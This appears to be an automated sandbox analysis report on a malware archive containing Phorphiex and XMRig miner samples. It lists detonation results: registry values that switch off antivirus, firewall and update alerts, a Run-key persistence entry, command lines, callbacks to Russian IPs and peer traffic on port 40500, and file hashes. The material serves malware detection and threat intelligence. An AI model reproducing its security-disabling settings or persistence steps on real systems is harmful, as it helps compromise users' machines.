Analysis Overview
SHA256
a3172e45bb1824fa625a04ff1d7e08617de13309ba9d31fb6b03ec9a921f345b
Threat Level: Known bad
The file 8051496142.zip was found to be: Known bad.
Malicious Activity Summary
Phorphiex family
xmrig
Windows security bypass
Phorphiex
XMRig Miner payload
Executes dropped EXE
UPX packed file
Blocklisted process makes network request
Downloads MZ/PE file
Windows security modification
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-28 09:11
Signatures
Phorphiex family
Analysis: behavioral12
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe
"C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe"
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4608 -ip 4608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 264
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| US | 20.42.65.89:443 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/4208-132-0x0000000000860000-0x0000000000881000-memory.dmp
memory/4608-133-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/4608-136-0x0000000000400000-0x000000000045D000-memory.dmp
memory/4208-137-0x0000000000860000-0x0000000000881000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\88266847.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winuedrvs.exe" | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
| File created | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\960721624.scr | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1927818951.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe
"C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe"
C:\Users\Admin\AppData\Local\Temp\960721624.scr
C:\Users\Admin\AppData\Local\Temp\960721624.scr
C:\Windows\winuedrvs.exe
C:\Windows\winuedrvs.exe
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\88266847.exe
C:\Users\Admin\AppData\Local\Temp\88266847.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| NL | 8.238.23.254:80 | tcp | |
| NL | 8.238.23.254:80 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 80.210.171.1:40500 | tcp | |
| YE | 78.137.81.157:40500 | udp | |
| IR | 151.238.216.247:40500 | udp | |
| DE | 51.116.253.170:443 | tcp | |
| YE | 178.130.100.100:40500 | udp | |
| KG | 212.112.116.198:40500 | udp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| IR | 2.185.65.140:40500 | udp | |
| YE | 94.26.223.89:40500 | udp | |
| YE | 134.35.222.123:40500 | tcp | |
| VE | 201.210.42.111:40500 | udp | |
| IR | 31.56.143.2:40500 | udp | |
| US | 93.184.220.29:80 | tcp | |
| YE | 80.253.191.92:40500 | udp | |
| TJ | 79.170.184.150:40500 | udp | |
| IR | 5.219.189.83:40500 | udp | |
| AF | 149.54.15.174:40500 | tcp | |
| IR | 2.185.253.170:40500 | udp | |
| IR | 31.59.145.163:40500 | udp | |
| CN | 117.31.176.154:40500 | udp | |
| MZ | 197.218.156.186:40500 | tcp | |
| UZ | 217.30.163.15:40500 | udp | |
| IR | 2.183.181.182:40500 | udp | |
| KZ | 84.240.255.178:40500 | udp | |
| IR | 80.210.56.154:40500 | udp | |
| YE | 134.35.228.137:40500 | udp | |
| IR | 188.159.128.42:40500 | tcp | |
| YE | 109.74.35.210:40500 | udp | |
| IR | 2.185.155.13:40500 | udp | |
| PK | 116.71.58.186:40500 | udp | |
| IR | 5.239.202.114:40500 | udp | |
| IR | 80.191.71.116:40500 | udp |
Files
memory/4296-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\960721624.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
C:\Users\Admin\AppData\Local\Temp\960721624.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/2744-135-0x0000000000000000-mapping.dmp
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/4720-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1927818951.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/4720-141-0x0000000000D70000-0x0000000000D76000-memory.dmp
memory/2156-142-0x0000000000000000-mapping.dmp
memory/4720-144-0x00007FFB54350000-0x00007FFB54E11000-memory.dmp
memory/4728-143-0x0000000000000000-mapping.dmp
memory/3684-145-0x0000000000000000-mapping.dmp
memory/4124-146-0x0000000000000000-mapping.dmp
memory/4720-147-0x00007FFB54350000-0x00007FFB54E11000-memory.dmp
memory/4876-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\88266847.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\88266847.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral20
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
134s
Max time network
146s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe | N/A |
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe
"C:\Users\Admin\AppData\Local\Temp\fca1bb147cee65edf9ef821063fe3899d5ab3da1ca5310c9efe9913204675366.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.238.20.126:80 | tcp | |
| US | 8.247.210.126:80 | tcp | |
| US | 20.42.65.84:443 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 93.184.220.29:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1355410489.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\118228510.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
| N/A | N/A | C:\Windows\winopdvcs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winopdvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winopdvcs.exe" | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
| File created | C:\Windows\winopdvcs.exe | C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1355410489.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1355410489.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe
"C:\Users\Admin\AppData\Local\Temp\1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334.exe"
C:\Windows\winopdvcs.exe
C:\Windows\winopdvcs.exe
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\118228510.exe
C:\Users\Admin\AppData\Local\Temp\118228510.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| IR | 151.235.107.162:40500 | tcp | |
| IR | 91.185.136.105:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| IR | 5.237.73.222:40500 | udp | |
| UZ | 217.30.172.154:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| KG | 212.112.115.77:40500 | udp | |
| MX | 187.209.96.104:40500 | udp | |
| UZ | 213.230.127.141:40500 | udp | |
| IN | 117.214.84.184:40500 | tcp | |
| MZ | 197.218.143.74:40500 | udp | |
| BR | 186.206.150.225:40500 | udp | |
| ID | 111.94.49.175:40500 | udp | |
| IN | 115.96.111.129:40500 | udp | |
| IR | 188.159.25.26:40500 | udp | |
| MX | 187.209.96.104:40500 | tcp | |
| IR | 37.202.193.26:40500 | udp | |
| IN | 117.212.116.115:40500 | udp | |
| YE | 78.137.85.114:40500 | udp | |
| RU | 178.185.103.45:40500 | udp | |
| SY | 185.151.151.218:40500 | tcp | |
| IR | 31.58.66.68:40500 | udp | |
| IR | 151.243.148.106:40500 | udp | |
| MZ | 197.218.141.232:40500 | udp | |
| IR | 2.182.248.225:40500 | udp | |
| IR | 2.179.17.92:40500 | udp | |
| DZ | 197.205.32.57:40500 | udp | |
| RU | 31.8.35.23:40500 | tcp | |
| IR | 2.183.175.119:40500 | udp | |
| TJ | 109.74.67.96:40500 | udp |
Files
memory/1724-54-0x0000000074B51000-0x0000000074B53000-memory.dmp
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
memory/2036-55-0x0000000000000000-mapping.dmp
C:\Windows\winopdvcs.exe
| MD5 | bd280f51fc7e46a3f9470713f5f859cc |
| SHA1 | ed748025627617facd90eaad22c36687819f7535 |
| SHA256 | 1d3c6d6b276c0e1fa559cd6e48a12da63098cc3823329db71c4dbc12fa3a2334 |
| SHA512 | b2c7aa0f9dffda55c078570d6ea51490ef5c5e13c1e8dccab7f0f5e324d785e3610e69a2f26d897bbd82ca74b4372447f838cc1296598faed4d9ddc45013bbc2 |
\Users\Admin\AppData\Local\Temp\1355410489.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1704-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1355410489.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1704-63-0x000000013FFD0000-0x000000013FFD6000-memory.dmp
memory/1704-64-0x000007FEFB771000-0x000007FEFB773000-memory.dmp
memory/1536-65-0x0000000000000000-mapping.dmp
memory/1948-66-0x0000000000000000-mapping.dmp
memory/1920-67-0x0000000000000000-mapping.dmp
memory/1044-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\118228510.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\118228510.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1276-70-0x0000000000000000-mapping.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220901-en
Max time kernel
97s
Max time network
134s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
